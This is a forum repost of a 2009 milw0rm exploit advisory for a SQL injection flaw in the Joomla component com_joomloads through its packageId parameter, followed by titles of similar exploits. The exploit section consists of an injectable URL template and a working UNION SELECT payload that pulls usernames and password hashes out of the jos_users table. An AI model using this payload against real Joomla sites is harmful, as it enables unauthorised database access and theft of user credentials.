- Code:
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] script : Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
http://localhost/path/index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>
demo:
-----
http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
# milw0rm.com [2009-07-23]
Joomla Component com_joomloads (packageId) SQL Injection Vuln
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability
» Joomla Component com_ijoomla_rss Blind SQL Injection Exploit
» Joomla Component com_jumi (fileid) Blind SQL Injection Exploit
» Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
» phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
» Joomla Component com_ijoomla_rss Blind SQL Injection Exploit
» Joomla Component com_jumi (fileid) Blind SQL Injection Exploit
» Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
» phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
|
|